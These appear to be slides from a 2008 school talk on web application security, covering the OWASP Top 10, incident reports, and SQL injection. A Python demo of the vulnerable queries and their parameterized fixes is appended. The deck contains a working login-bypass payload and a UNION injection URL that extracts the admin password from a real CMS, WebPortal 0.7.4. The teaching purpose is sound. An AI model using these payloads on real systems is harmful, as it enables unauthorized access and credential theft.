Ort Spirit 2008. Ezequiel Gutesman (gutes)

(In)security in web applications

Ezequiel Gutesman
Escuelas Técnicas ORT Sede Almagro
Core Security Technologies
2008

http://www.flickr.com/photos/da100fotos/1297595709/

gutes@ort:~$ whoami

  • Former student of this school, class of 2000. Teacher at Escuelas Técnicas ORT Sede Almagro (2001- ).
  • Researcher at Corelabs - Core Security Technologies.
  • Student, Licenciatura in Computer Science, UBA – FCEyN.

What is a web application?

Where do we see them?

http://www.flickr.com/photos/declanjewell/517966692/

http://www.flickr.com/photos/kitcowan/731269699/

They store OUR information

http://www.flickr.com/photos/superfantastic/2567098623/

http://www.flickr.com/photos/roby72/2401722298/

Public information

Private information

A web application must:

  • Guarantee privacy
  • Preserve identity
  • Provide anonymity
  • Be available
  • Etc., etc...

Vulnerabilities

http://www.flickr.com/photos/lebonbonmulticolore/491220542/

Vulnerabilities in web applications

Web server

http://openclipart.org

OWASP Top 10 2007

  • Cross Site Scripting (XSS)
  • Injection Flaws (especially SQL Injection)
  • Malicious File Execution
  • Insecure Direct Object Reference
  • Cross Site Request Forgery (CSRF)
  • Information Leakage and Improper Error Handling
  • Broken Authentication and Session Management
  • Insecure Cryptographic Storage
  • Insecure Communications
  • Failure to Restrict URL Access

SOURCE: http://www.owasp.org/index.php/Top_10_2007

Incidents

  • WHID 2008-06: Hackers Take Down Pennsylvania Government
    – Attack Method: SQL Injection
    – Country: USA
    – Outcome: Planting of Malware
    – Outcome: Defacement
    – Vertical: Government

SOURCE: http://www.webappsec.org

Incidents

  • WHID 2008-04: RIAA (Recording Industry Association of America) web site cleared
    – Attack Method: Cross Site Scripting (XSS)
    – Attack Method: SQL Injection
    – Attack Method: Denial of Service
    – Attack Method: SQL Injection
    – Country: Global
    – Country: USA
    – Outcome: Defacement
    – Outcome: Downtime
    – Outcome: Defacement
    – Vertical: Entertainment

SOURCE: http://www.webappsec.org

Incidents

  • WHID 2007-79: Infamous Russian malware gang used SQL injection to penetrate US government sites
    – Attack Method: SQL Injection
    – Country: Brazil
    – Country: USA
    – Origin: Russia
    – Outcome: Planting of Malware
    – Vertical: Government

SOURCE: http://www.webappsec.org

Web applications (3 tiers - simplified)

  • Presentation (html, css, flash, etc.)
  • Logic (ASP.NET, Java, PHP, Python, Ruby, etc.)
  • Data (MS-SQL, MySQL, Oracle, PostgreSQL, etc.)

Attacking

Example: "Fetch all client records whose username is 'jose' and whose password is 'pepito'"

SELECT * FROM clients WHERE username = 'jose' AND password = 'pepito'

Example (the single row that query returns):

username        | Jose
mail            | [email protected]
cc              | 3782 8224 6310 005
billing address | Yatay 240

Example: the application builds the query by pasting the form fields into the SQL text

SELECT * FROM clients WHERE username = '$user' AND password = '$pass'

Input: $user ← uno' OR 1=1;--

The query the database actually receives is

SELECT * FROM clients WHERE username = 'uno' OR 1 = 1 ;--' AND password = '...

The condition is now always true, and everything after -- is a SQL comment, so the password check is never evaluated.

Example (with the condition always true, the query returns every client row):

username | mail              | cc                 | billing address
Jose     | [email protected] | 3782 8224 6310 005 | Yatay 240
Fernando | [email protected] | 3852 0000 0232 37  | Corrientes 1112
Pablo    | [email protected] | 3434 0430 0112 3   | Libertador 221
Mariela  | [email protected] | 5555 5555 55554 444 | Pueyrredon 566
Agustina | [email protected] | 444 0000 6812 37   | Sta. Fe 322
Carla    | [email protected] | 385332 3 05672     | Padilla 988
Pedro    | [email protected] | 3852 12 0256 5     | Cordoba 444

Demo

WebPortal CMS 'download.php' SQL Injection Vulnerability

  Bugtraq ID: 31156
  Class: Input Validation Error
  CVE:
  Remote: Yes
  Local: No
  Published: Sep 12 2008 12:00AM
  Updated: Sep 15 2008 07:20PM
  Credit: StAkeR
  Vulnerable: WebPortal WebPortal CMS 0.7.4

The bug

Exploiting the bug

download.php?aid=1'+union+select+pass,0,0,0,0+from+portal_users+where+id='1

After URL decoding ('+' becomes a space) the application runs the following query. The UNION works because it supplies the same number of columns, five, as portal_attachments, so the password column of portal_users is returned in place of an attachment row:

SELECT * FROM portal_attachments WHERE id = '1' UNION SELECT pass,0,0,0,0 FROM portal_users WHERE id = '1';
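To make both injections on these slides concrete (the `uno' OR 1=1;--` login bypass shown earlier and the download.php UNION query just above), here is an added Python example; it is not code from the talk or from WebPortal CMS. It runs each vulnerable query against a constructed in-memory SQLite database and, beside it, the same query with bound parameters. The table names follow the slides; the column layouts, the sample rows and the portal_users password value are assumptions made for the demo.

```python
import sqlite3
from urllib.parse import parse_qs

# Constructed sample data for this demo: names, e-mails, card numbers and the
# portal_users row are placeholders, not data from the talk or from WebPortal CMS.
CLIENTS = [
    ("jose", "pepito", "jose@example.com", "3782 8224 6310 005", "Yatay 240"),
    ("fernando", "hunter2", "fernando@example.com", "3852 0000 0232 37", "Corrientes 1112"),
    ("pablo", "qwerty", "pablo@example.com", "3434 0430 0112 3", "Libertador 221"),
]
ATTACHMENTS = [(1, "manual.pdf", 1024, "application/pdf", "/files/manual.pdf")]
PORTAL_USERS = [(1, "admin-hash-placeholder")]

# The query string from the slide, decoded the way download.php would see it:
# '+' becomes a space, quotes and commas pass through untouched.
SLIDE_QUERY_STRING = "aid=1'+union+select+pass,0,0,0,0+from+portal_users+where+id='1"
UNION_PAYLOAD = parse_qs(SLIDE_QUERY_STRING)["aid"][0]
LOGIN_PAYLOAD = "uno' OR 1=1;--"


def build_db() -> sqlite3.Connection:
    """In-memory SQLite database with the three tables the slides mention (assumed layouts)."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE clients (username TEXT, password TEXT, mail TEXT, cc TEXT, billing_address TEXT);
        CREATE TABLE portal_attachments (id INTEGER, name TEXT, size INTEGER, mime TEXT, path TEXT);
        CREATE TABLE portal_users (id INTEGER, pass TEXT);
        """
    )
    con.executemany("INSERT INTO clients VALUES (?, ?, ?, ?, ?)", CLIENTS)
    con.executemany("INSERT INTO portal_attachments VALUES (?, ?, ?, ?, ?)", ATTACHMENTS)
    con.executemany("INSERT INTO portal_users VALUES (?, ?)", PORTAL_USERS)
    return con


def login_vulnerable(con, user, password):
    """The slide's query built by string concatenation: user input becomes SQL."""
    sql = f"SELECT * FROM clients WHERE username = '{user}' AND password = '{password}'"
    return con.execute(sql).fetchall()


def login_safe(con, user, password):
    """Same query with bound parameters: the input is only ever a value, never SQL.
    Passwords stay in clear text here to mirror the slide; a real application stores
    a salted hash and compares against that."""
    sql = "SELECT * FROM clients WHERE username = ? AND password = ?"
    return con.execute(sql, (user, password)).fetchall()


def download_vulnerable(con, aid):
    """download.php as the advisory describes it: the aid parameter is concatenated."""
    sql = f"SELECT * FROM portal_attachments WHERE id = '{aid}'"
    return con.execute(sql).fetchall()


def download_safe(con, aid):
    """Hardened version: an attachment id must be an integer, and it is bound, not pasted."""
    try:
        aid = int(aid)
    except (TypeError, ValueError):
        return []  # anything that is not a number is rejected outright
    return con.execute("SELECT * FROM portal_attachments WHERE id = ?", (aid,)).fetchall()


if __name__ == "__main__":
    con = build_db()
    print("login, injected   :", login_vulnerable(con, LOGIN_PAYLOAD, "whatever"))  # every client row
    print("login, bound      :", login_safe(con, LOGIN_PAYLOAD, "whatever"))        # []
    print("download, injected:", download_vulnerable(con, UNION_PAYLOAD))          # attachment + password row
    print("download, bound   :", download_safe(con, UNION_PAYLOAD))                # []
```

The injected download query only succeeds because `pass,0,0,0,0` matches the five columns of portal_attachments; change the table to four columns and SQLite rejects the UNION, which is why attackers probe the column count first. Binding the parameter removes the problem regardless of column count, and the integer check on top of it rejects the payload before a query is ever built.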

Questions?

Ezequiel Gutesman
egutes [at] ort [dot] edu [dot] ar
gutes [at] coresecurity [dot] com
http://corelabs.coresecurity.com

thanks!
